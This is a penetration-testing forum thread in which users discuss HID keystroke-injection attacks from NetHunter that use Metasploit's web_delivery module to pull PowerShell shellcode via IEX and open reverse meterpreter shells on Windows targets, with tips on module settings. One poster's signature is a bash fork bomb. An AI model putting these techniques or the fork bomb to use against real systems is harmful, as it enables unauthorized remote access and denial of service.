Results 1 to 8 of 8

Thread: HID attacks using metasploit's psh_web_delivery instead of Powersploit

  1. #1
    Join Date
    2014-Nov
    Posts
    9

    HID attacks using metasploit's psh_web_delivery instead of Powersploit

    Powersploit is an excellent tool but I have found it to be less then reliable when dealing with 64-bit systems (at least with Net Hunter and the HID attack) and when using the powersploit payload for the HID attack you are required to have either Apache running on your net hunter device and hope the target network does not have client separation to prevent the victim from pulling powershell code off your net hunter device or push your own powersploit payload to a server for it to be pulled down from. The problem with this is you can potentially have to spin up two servers to serve up the payload and then receive a connect back shell. A more efficient and flexible option is to use powershell to pull down shellcode from metasploit's exploit/windows/misc/psh_web_delivery and then pass the URL it serves up to Net Hunter to download and run via IEX as you would any powershell payload. The main advantage of this is all outbound traffic goes to only one server (the server that would receive the connect back that would be serving up the payload via a different MSF module) and you can potentially serve payloads other then meterpreter (any powershell code really).

  2. #2
    Join Date
    2014-Sep
    Posts
    176
    I find this idea very interesting. I would love to give a test out when I get some time.

  3. #3
    Join Date
    2014-Nov
    Posts
    9
    I can confirm that this vector does work on windows 8.1 using exploit/multi/script/web_delivery and meterpreter/reverse_https as the payload and seems to provide a more stable meterpreter connection then the powersploit vector. If anyone wants I can post a tutorial in how to use this vector in the How To section.

  4. #4
    Join Date
    2014-Nov
    Location
    Sweden
    Posts
    21
    @thesle3p that would be great! Thank you!
    ){ :|:& };:

  5. #5
    Hi, everyone, any news updated?? As I tried to apply this method, but there is no any payload option for windows when using exploits/multi/script/web_delivery.

    Is there anyone having the same issues just like me???

  6. #6
    Okay, I am stupid, I just noticed that I need to first set the target to 2 which is for PSH, now I can use windows payload....

  7. #7
    Join Date
    2014-Nov
    Posts
    9
    Yeah, further testing revealed it works extremely well with exploits/multi/script/web_delivery with what ever windows payload you throw at it, sorry it took so long to return to this.

  8. What a great idea, it will help a lot for me, thank you very much

Similar Threads

  1. Need help with hid attacks (cmd)
    By Roberton55 in forum NetHunter General Questions
    Replies: 1
    Last Post: 2016-11-12, 22:49
  2. HID attacks bug
    By Reginiano in forum NetHunter General Questions
    Replies: 2
    Last Post: 2016-10-18, 16:52
  3. p2p adb attacks?
    By thesle3p in forum NetHunter Suggestions
    Replies: 5
    Last Post: 2014-12-21, 21:00
  4. Powersploit configuration
    By Skyrider in forum NetHunter General Questions
    Replies: 1
    Last Post: 2014-09-25, 23:14

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •